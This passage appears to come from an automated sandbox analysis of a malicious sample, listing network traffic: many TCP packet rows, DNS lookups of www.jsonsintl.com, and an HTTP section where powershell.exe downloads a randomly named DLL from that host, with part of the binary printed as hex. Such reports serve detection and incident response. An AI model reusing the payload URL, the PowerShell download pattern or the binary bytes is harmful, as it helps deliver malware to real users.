                                                                              May 23, 2022 08:54:13.614000082 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614023924 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614048958 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614051104 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614072084 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614094973 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614098072 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614120007 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614132881 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614145041 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614167929 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614181042 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614192009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614216089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614243984 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614244938 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614269018 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614290953 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614291906 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614315987 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614339113 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614339113 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614363909 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614382029 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614389896 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614438057 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614460945 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614460945 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614484072 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614506960 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614509106 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614531040 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614543915 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614554882 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614578009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614593029 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614602089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614624977 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614649057 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614650011 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614672899 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614696026 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614696980 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614722013 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614734888 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.614743948 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.614782095 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.736660957 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736706972 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736727953 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736748934 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.736836910 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737138987 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737168074 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737190008 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737214088 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737241030 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737298965 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737581968 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737612009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737633944 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737656116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.737663031 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.737705946 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.740108013 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740142107 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740164995 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740189075 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.740231037 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.740263939 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.742799997 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742830992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742856026 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742894888 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.742913961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742939949 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742964029 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.742978096 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.743031025 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744553089 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744597912 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744630098 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744658947 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744688988 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744690895 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744708061 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744748116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744796038 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744800091 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744831085 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744862080 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744885921 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744891882 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744923115 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744934082 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.744954109 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.744985104 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745001078 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745011091 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745038986 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745054960 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745063066 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745089054 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745115042 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745116949 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745146990 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745165110 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745174885 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745207071 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745218039 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745238066 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745285988 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745299101 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745326996 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745348930 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745362997 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.745376110 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.745433092 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.864980936 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865017891 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865040064 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865062952 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865086079 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865109921 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865109921 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865133047 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865154028 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865163088 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865175962 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865197897 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865202904 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865220070 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865242958 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865259886 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865266085 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865288973 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865294933 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865315914 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865344048 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865355968 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865390062 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865403891 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865416050 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865439892 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865466118 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865473032 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865490913 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865519047 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865520000 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865540981 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865562916 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865571976 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865624905 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865626097 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865650892 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865694046 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865700006 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865717888 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865740061 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865761042 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865767956 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865786076 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865812063 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865813971 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865834951 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865858078 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865864038 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865881920 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865911961 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.865931988 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865957975 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865981102 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.865991116 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866007090 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866029978 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866036892 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866059065 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866090059 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866101027 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866126060 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866149902 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866158962 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866173029 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866198063 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866199017 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866240978 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866255045 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866266966 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866293907 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866312981 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866318941 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866343975 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866369963 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866388083 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866396904 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866416931 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866436005 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866460085 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866482973 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866485119 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866535902 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866537094 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866563082 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866583109 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.866583109 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.866628885 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:16.050178051 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:45.440145969 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:45.613410950 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:45.613563061 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:45.720171928 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:45.893306971 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:45.908353090 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:45.908369064 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:45.908534050 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:46.616609097 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:46.789706945 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:46.798378944 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:46.798520088 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:46.808393002 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:46.981555939 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:47.652729988 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:47.654411077 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:50.651046991 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:50.651068926 CEST808049782173.82.82.196192.168.2.5
                                                                              May 23, 2022 08:54:50.651112080 CEST497828080192.168.2.5173.82.82.196
                                                                              May 23, 2022 08:54:50.651144981 CEST497828080192.168.2.5173.82.82.196

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 23, 2022 08:54:12.413779974 CEST5432253192.168.2.58.8.8.8
                                                                              May 23, 2022 08:54:12.551898956 CEST53543228.8.8.8192.168.2.5
                                                                              May 23, 2022 08:54:12.559169054 CEST6270453192.168.2.58.8.8.8
                                                                              May 23, 2022 08:54:12.697422028 CEST53627048.8.8.8192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              May 23, 2022 08:54:12.413779974 CEST192.168.2.58.8.8.80xb7e3Standard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                                                              May 23, 2022 08:54:12.559169054 CEST192.168.2.58.8.8.80x4ea1Standard query (0)www.jsonsintl.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              May 23, 2022 08:54:12.551898956 CEST8.8.8.8192.168.2.50xb7e3No error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                              May 23, 2022 08:54:12.551898956 CEST8.8.8.8192.168.2.50xb7e3No error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                                                              May 23, 2022 08:54:12.697422028 CEST8.8.8.8192.168.2.50x4ea1No error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                              May 23, 2022 08:54:12.697422028 CEST8.8.8.8192.168.2.50x4ea1No error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.jsonsintl.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.54975498.142.105.10680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              May 23, 2022 08:54:12.907315016 CEST443OUTGET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                              Host: www.jsonsintl.com
                                                                              Connection: Keep-Alive
                                                                              May 23, 2022 08:54:13.094686031 CEST511INHTTP/1.1 200 OK
                                                                              Date: Mon, 23 May 2022 06:54:12 GMT
                                                                              Server: Apache
                                                                              X-Powered-By: PHP/5.6.40
                                                                              Cache-Control: no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 23 May 2022 06:54:13 GMT
                                                                              Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
                                                                              Content-Transfer-Encoding: binary
                                                                              Set-Cookie: 628b2f9502924=1653288853; expires=Mon, 23-May-2022 06:55:13 GMT; Max-Age=60; path=/
                                                                              Last-Modified: Mon, 23 May 2022 06:54:13 GMT
                                                                              Content-Length: 365056
                                                                              Vary: Accept-Encoding,User-Agent
                                                                              Keep-Alive: timeout=5, max=40
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdownload
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@
                                                                              May 23, 2022 08:54:13.094719887 CEST512INData Raw: 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: B
                                                                              May 23, 2022 08:54:13.094737053 CEST514INData Raw: c4 72 6b 45 40 c7 45 c8 67 bf 2f 7b c7 45 cc 6d 62 50 76 c7 45 d0 98 20 2b 59 c7 45 d4 3c 09 64 ac c7 45 d8 e2 4d 20 7a c7 45 dc 24 06 55 0e c7 45 e0 4e ae 85 62 c7 45 e4 30 6b 6a 2e c7 45 e8 8f 78 69 79 c7 45 ec 3a 09 21 40 c7 45 f0 98 3d 4d 14
                                                                              Data Ascii: rkE@Eg/{EmbPvE +YE<dEM zE$UENbE0kj.ExiyE:!@E=MEBXE6E;#tEIE<*1E#\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_oE<2E@FED;EH7EL-
                                                                              May 23, 2022 08:54:13.094753027 CEST515INData Raw: 85 14 02 00 00 a4 07 46 6c c7 85 18 02 00 00 3a 30 04 53 c7 85 1c 02 00 00 f2 78 41 38 c7 85 20 02 00 00 39 02 16 4e c7 85 24 02 00 00 bd 60 71 59 c7 85 28 02 00 00 1e 59 0b 65 c7 85 2c 02 00 00 0a b9 17 4e c7 85 30 02 00 00 3a 8f 79 e5 c7 85 34
                                                                              Data Ascii: Fl:0SxA8 9N$`qY(Ye,N0:y4b%8<>N@o;ED(7Hp PL5P6CT& X2{\ePO`/CdTG0h}WLltuOp:Yt
                                                                              May 23, 2022 08:54:13.094765902 CEST517INData Raw: e0 c7 85 2c 04 00 00 5e 60 de e9 c7 85 30 04 00 00 23 28 a7 8b c7 85 34 04 00 00 1f 35 ee b8 c7 85 38 04 00 00 2b 4f b7 5c c7 85 3c 04 00 00 70 75 b6 ab c7 85 40 04 00 00 26 5c 68 52 c7 85 44 04 00 00 8b 5f 6c b5 c7 85 48 04 00 00 62 eb 89 02 c7
                                                                              Data Ascii: ,^`0#(458+O\<pu@&\hRD_lHbL+qP>TjfXX\Cb`42dq?h4%llpsoKt#xi|>l|%c$mH
                                                                              May 23, 2022 08:54:13.094778061 CEST518INData Raw: 80 7d 42 c7 85 44 06 00 00 21 77 55 92 c7 85 48 06 00 00 65 d4 b4 28 c7 85 4c 06 00 00 73 9a 42 99 c7 85 50 06 00 00 d7 2b 4b 2a c7 85 54 06 00 00 de a5 2e 6c c7 85 58 06 00 00 35 81 b2 06 c7 85 5c 06 00 00 a3 eb a0 9b c7 85 60 06 00 00 db 54 67
                                                                              Data Ascii: }BD!wUHe(LsBP+K*T.lX5\`Tg9doEhulCepd$t"aVx#d|?N3]='O5[(;.,:'U@et%</LI
                                                                              May 23, 2022 08:54:13.094790936 CEST519INData Raw: 00 46 4c 49 6e c7 85 5c 08 00 00 5f 24 bd 63 c7 85 60 08 00 00 b1 d1 43 35 c7 85 64 08 00 00 71 e1 68 d3 c7 85 68 08 00 00 94 b3 8d 66 c7 85 6c 08 00 00 e1 a2 02 41 c7 85 70 08 00 00 e0 b7 b7 78 c7 85 74 08 00 00 f6 dc 23 24 c7 85 78 08 00 00 47
                                                                              Data Ascii: FLIn\_$c`C5dqhhflApxt#$xGz|Q[nsmKa?<J(+y@p3zmm7jue75@
